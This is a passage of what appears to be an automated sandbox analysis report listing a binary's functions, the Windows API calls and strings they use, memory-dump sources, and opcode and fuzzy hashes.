                                • Opcode Fuzzy Hash: 92b539ca3e0c5f6cc4ab3c9f73a5a429e92e7529c36422e3158b58293769a5b0
                                • Instruction Fuzzy Hash: 0821C271D14208ABDB10EFA5C881FDEB7FCEB09714F10416FE855A3281D77866088BB5
                                Function 0046C8D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 0046C92C
                                • SHGetFileInfoW.SHELL32(dummy,00000010,00000000,000002B4,00000111), ref: 0046C94C
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: FileInfo_memset
                                • String ID: dummy
                                • API String ID: 2638500827-1341452863
                                • Opcode ID: 39584f37234f12ceba60b33f0966fe5be9a25adb699d324d2cd6eaae490f2d32
                                • Instruction ID: 34207cb54232210df3e410c3426895dd0293e4b59b264748dbbebd727176387b
                                • Opcode Fuzzy Hash: 39584f37234f12ceba60b33f0966fe5be9a25adb699d324d2cd6eaae490f2d32
                                • Instruction Fuzzy Hash: 7F11A770A0030CABDF50EF64DC46BAE73E49B05304F40459EE90D9B382EB756A18DF59
                                Function 0047C230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
                                Download Yara Rule
                                APIs
                                • __wcsnicmp.LIBCMT ref: 0047C266
                                • GetCurrentProcessId.KERNEL32(1D1D1D8C,?,?,?), ref: 0047C272
                                  • Part of subcall function 0047C190: RegOpenKeyExW.ADVAPI32 ref: 0047C1B0
                                  • Part of subcall function 0047C190: RegQueryValueExW.ADVAPI32(?,Path,00000000), ref: 0047C1E0
                                  • Part of subcall function 0047C190: RegCloseKey.ADVAPI32 ref: 0047C1EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CloseCurrentOpenProcessQueryValue__wcsnicmp
                                • String ID: PrN
                                • API String ID: 4025261707-529563713
                                • Opcode ID: 9c82e9ac8792b6d4bb54f02041db6a3e653e0b47daa911781d39231e6839d583
                                • Instruction ID: 06d61b6dee211bcea7aa0e6dc66a31dceec7f1586715560bfa64037558db7496
                                • Opcode Fuzzy Hash: 9c82e9ac8792b6d4bb54f02041db6a3e653e0b47daa911781d39231e6839d583
                                • Instruction Fuzzy Hash: AA01A7A2E0014056E61477F6BCC569B23549BD0376B10C4BFFA0589253F728844197AD
                                Function 0044E640 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • D, xrefs: 0044E65E, 0044E6C3
                                • in Json::Value::duplicateStringValue(): Failed to allocate string value buffer, xrefs: 0044E68A
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: _malloc
                                • String ID: D$in Json::Value::duplicateStringValue(): Failed to allocate string value buffer
                                • API String ID: 1579825452-1789853658
                                • Opcode ID: 75298489d849f845ba64b3fc91c1800b282d06b8886ee4aea7138ed160373318
                                • Instruction ID: c6d8451d7cf46d9193f8aafad735d3d9bfb55c423160826813fa3bd8bb0dcf15
                                • Opcode Fuzzy Hash: 75298489d849f845ba64b3fc91c1800b282d06b8886ee4aea7138ed160373318
                                • Instruction Fuzzy Hash: A401C872905258ABD710DB59C901B9EBBECEB49720F10026FE414A33C1EB79990487E9
                                Function 0047A474 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0047A200: GetProcessHeap.KERNEL32(1D1D1D8C), ref: 0047A228
                                • ReleaseMutex.KERNEL32(?), ref: 0047A47D
                                • CloseHandle.KERNEL32(?), ref: 0047A49F
                                  • Part of subcall function 0047A8A0: GetProcessHeap.KERNEL32(?,0047A492), ref: 0047A8A6
                                  • Part of subcall function 0047A8A0: HeapFree.KERNEL32(00000000,00000000,?), ref: 0047A8B4
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Heap$Process$CloseFreeHandleMutexRelease
                                • String ID: (bN
                                • API String ID: 3832489521-263236600
                                • Opcode ID: d957a6a7a796b828490e71499ce251828a244c3c8b724b0685df1eef20c7035f
                                • Instruction ID: 096040a672289b3e11b7f3a286a86e08f0e024de8603eaa531badf1606ead50a
                                • Opcode Fuzzy Hash: d957a6a7a796b828490e71499ce251828a244c3c8b724b0685df1eef20c7035f
                                • Instruction Fuzzy Hash: 06D01235405100DBC721AFA4994C6AE3634ABD4734F558399E4142B3A1CB7D98129B9F
                                Function 0047A4C0 Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0047A200: GetProcessHeap.KERNEL32(1D1D1D8C), ref: 0047A228
                                • GetProcessHeap.KERNEL32(00000000,?), ref: 0047A4FC
                                • HeapFree.KERNEL32(00000000), ref: 0047A4FF
                                • GetProcessHeap.KERNEL32(?), ref: 0047A51D
                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 0047A527
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Heap$Process$Free
                                • String ID:
                                • API String ID: 3168794593-0
                                • Opcode ID: 799aa3df361be9bd4b2d852b99a9f77535238c035179bec6a1d7b42f949e0c41
                                • Instruction ID: c2409097a47e11fdc18ddb454556df87e0a1a1e7dbbeb792cb94f8ddfad5f825
                                • Opcode Fuzzy Hash: 799aa3df361be9bd4b2d852b99a9f77535238c035179bec6a1d7b42f949e0c41
                                • Instruction Fuzzy Hash: 97F062B42002016AE6106BB69CC0F9B379CEB84754F05447AF504D7292DB28D911CEAE